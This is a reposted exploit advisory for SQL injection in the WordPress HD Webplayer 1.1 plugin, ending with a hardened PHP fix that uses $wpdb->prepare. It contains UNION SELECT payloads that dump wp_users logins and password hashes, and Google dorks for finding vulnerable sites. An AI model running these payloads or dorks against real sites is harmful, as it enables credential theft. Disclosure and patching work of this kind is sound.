
WordPress HD Webplayer 1.1 SQL Injection and Fix - Website Security

Source: 自学PHP网 (www.zixuephp.com)    Date: 2015-04-17 11:59

Title: WordPress HD Webplayer 1.1 SQL Injection
Author: JoinSe7en
Vendor site: http://www.hdwebplayer.com/
Software link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
Affected version: version 1.1
Tested on: Windows 7, Backtrack 5 r3

+----------------------------------------------------------------------+
|                 Vulnerability 1 - config.php                         |
+----------------------------------------------------------------------+

# Location:

http://www.2cto.com /wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]

# Exploit Code:

config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                 Vulnerability 2 - playlist.php                       |
+----------------------------------------------------------------------+

# Location:

http://www.2cto.com /wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]

# Exploit Code:

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different

Three different search keywords (dorks):

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

Fix: targeted filtering of the injected parameters (the `id` and `videoid` values) before they reach the query.
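As an added example, not code from the advisory or from the plugin (whose source this page does not show), the targeted filtering the fix line refers to, written as a WordPress query handler. It assumes a hypothetical table name and that the plugin looks a record up by the integer `id` / `videoid` parameter:

```php
<?php
// Added example; not the plugin's code. Assumed weak pattern (hypothetical):
//   $id  = $_GET['id'];
//   $row = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}hdw_videos WHERE id = $id");
// Everything after the number in "1 UNION SELECT ..." is passed straight to MySQL.

// Hardened version: coerce the parameter to a non-negative integer, reject
// zero/invalid values, and bind it with $wpdb->prepare() so no request text
// is ever interpreted as SQL. Works the same for playlist.php?videoid=.
function hdw_get_video_by_id( $raw_id ) {
    global $wpdb;

    // absint() casts to int: "1 UNION SELECT ..." becomes 1, non-numeric input becomes 0.
    $id = absint( $raw_id );
    if ( 0 === $id ) {
        return null; // missing or malformed id: do not query at all
    }

    // Table name hdw_videos is hypothetical; %d forces integer binding.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}hdw_videos WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}

// Usage in the request handler (id comes from the query string):
$video = hdw_get_video_by_id( isset( $_GET['id'] ) ? $_GET['id'] : 0 );
```

A request whose `id` parameter is anything other than a plain positive integer is now answered from the `0 === $id` branch, which is also the simplest thing to log when hunting for injection attempts against these two files.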
